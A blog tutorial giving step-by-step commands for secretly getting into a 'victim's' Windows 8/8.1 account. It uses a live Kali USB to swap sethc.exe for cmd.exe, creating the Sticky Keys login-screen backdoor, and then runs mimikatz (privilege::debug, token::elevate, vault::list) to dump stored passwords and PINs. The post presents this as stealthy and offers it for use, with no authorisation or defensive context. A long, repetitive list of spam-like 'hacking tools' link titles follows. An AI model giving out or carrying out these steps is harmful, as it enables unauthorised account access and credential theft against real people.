Thursday 25 May 2023

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Related links


  1. Hack Rom Tools
  2. Nsa Hack Tools Download
  3. Hacker Tools 2020
  4. Hacking Tools
  5. Pentest Tools Tcp Port Scanner
  6. Hack Tools Pc
  7. Hacker Tools Online
  8. Underground Hacker Sites
  9. Hacker Tools Free Download
  10. Hacking Tools Usb
  11. Hackrf Tools
  12. Hack Tools For Mac
  13. Nsa Hack Tools
  14. Pentest Box Tools Download
  15. Hacker Techniques Tools And Incident Handling
  16. Pentest Tools For Ubuntu
  17. Github Hacking Tools
  18. Termux Hacking Tools 2019
  19. Hak5 Tools
  20. Hacker Tools For Pc
  21. Pentest Tools Nmap
  22. Pentest Tools Alternative
  23. Hacker Tools
  24. Hacking Tools 2020
  25. Bluetooth Hacking Tools Kali
  26. Pentest Tools Windows
  27. Nsa Hacker Tools
  28. Hacker Tools Github
  29. Pentest Tools Url Fuzzer
  30. Pentest Tools Bluekeep
  31. Pentest Tools Bluekeep
  32. Best Pentesting Tools 2018
  33. Usb Pentest Tools
  34. Hack Tools
  35. Beginner Hacker Tools
  36. Easy Hack Tools
  37. Hacker Tools Software
  38. Hacking Tools Hardware
  39. Hacker Search Tools
  40. Hacking Tools Windows 10
  41. Hacking Apps
  42. Nsa Hack Tools Download
  43. Pentest Tools For Android
  44. Install Pentest Tools Ubuntu
  45. Pentest Tools Find Subdomains
  46. Hacking Tools For Mac
  47. Hack Rom Tools
  48. Pentest Reporting Tools
  49. Hack Tools Pc
  50. Hack Tool Apk
  51. Hacker Tools Hardware
  52. Pentest Box Tools Download
  53. Hack And Tools
  54. Easy Hack Tools
  55. Pentest Box Tools Download
  56. Best Hacking Tools 2019
  57. Tools 4 Hack
  58. Hacking Tools For Windows Free Download
  59. Pentest Tools Online
  60. Hacker Tools Apk Download
  61. Hacker Hardware Tools
  62. What Is Hacking Tools
  63. Bluetooth Hacking Tools Kali
  64. Black Hat Hacker Tools
  65. Pentest Automation Tools
  66. New Hacker Tools
  67. Pentest Tools Port Scanner
  68. Pentest Tools Port Scanner
  69. Top Pentest Tools
  70. Hacking Tools Hardware
  71. Pentest Tools
  72. Tools 4 Hack
  73. What Are Hacking Tools
  74. Hack Tool Apk
  75. Pentest Tools Online
  76. Pentest Reporting Tools
  77. Pentest Tools
  78. Hacker Hardware Tools
  79. Hacker Tools For Mac
  80. Hacker Tools Software
  81. Hacking Apps
  82. Wifi Hacker Tools For Windows
  83. How To Make Hacking Tools
  84. Hack Tools Github
  85. Hacker
  86. Hacking Apps
  87. Hack Tools For Pc
  88. Pentest Tools Tcp Port Scanner
  89. Hacking Tools Hardware
  90. Github Hacking Tools
  91. How To Hack
  92. Hack Tools Github
  93. Hack Tools For Windows
  94. Tools For Hacker
  95. Hackers Toolbox
  96. Tools For Hacker
  97. Hacking Tools Software
  98. Pentest Tools Online
  99. Pentest Tools Alternative
  100. Hacker Tools 2019
  101. Hack Tools For Mac
  102. Hacking Tools Github
  103. Tools For Hacker
  104. Wifi Hacker Tools For Windows
  105. Hacker Tools For Ios
  106. Hacker Tools For Ios
  107. Tools For Hacker
  108. Hack Tools For Ubuntu
  109. New Hack Tools
  110. Termux Hacking Tools 2019
  111. World No 1 Hacker Software
  112. Hacking Tools Mac
  113. Hacker Techniques Tools And Incident Handling
  114. Hack Tools For Mac
  115. Pentest Tools For Mac
  116. Pentest Tools Github
  117. What Are Hacking Tools
  118. Bluetooth Hacking Tools Kali
  119. How To Make Hacking Tools
  120. Hacker
  121. Growth Hacker Tools
  122. Pentest Tools Online
  123. Pentest Tools Open Source
  124. Pentest Tools Kali Linux
  125. What Is Hacking Tools
  126. Tools For Hacker
  127. Hack Apps
  128. Nsa Hack Tools Download
  129. Hack Tools Github
  130. Pentest Tools Apk
  131. Hacking Tools For Mac
  132. Pentest Tools
  133. Ethical Hacker Tools
  134. Pentest Tools Kali Linux
  135. Hackers Toolbox
  136. Pentest Recon Tools
  137. Hacking Tools Windows
  138. Hacking Tools Name
  139. Pentest Tools Open Source
  140. Blackhat Hacker Tools
  141. Hak5 Tools
  142. Hacker Tools Free Download
  143. Hacking Tools Github
  144. Hacker Tools For Ios
  145. Hack Tools Github
  146. Hacks And Tools
  147. Hacker Tools Github
  148. Hacking Tools Download
  149. What Are Hacking Tools
  150. Pentest Tools Open Source
  151. Hacking Tools Hardware
  152. Hacker Security Tools
  153. Hacking Tools For Kali Linux
  154. Hacking Tools Free Download
  155. Hack Tools For Windows
  156. Hack Tools Github
  157. New Hack Tools
  158. Hacking Tools For Pc
  159. Hacker Hardware Tools
  160. Pentest Tools Framework
  161. Hack Tools 2019
  162. Hacking Tools For Mac
  163. Hack Tools Mac
  164. Hacker Tools For Pc
  165. Computer Hacker
  166. Hacker Tools 2020
  167. Hack Tools Online
  168. Hacker Tools Mac
  169. Hacker Tools Windows
  170. Hacking Tools
  171. Nsa Hack Tools Download

No comments:

Post a Comment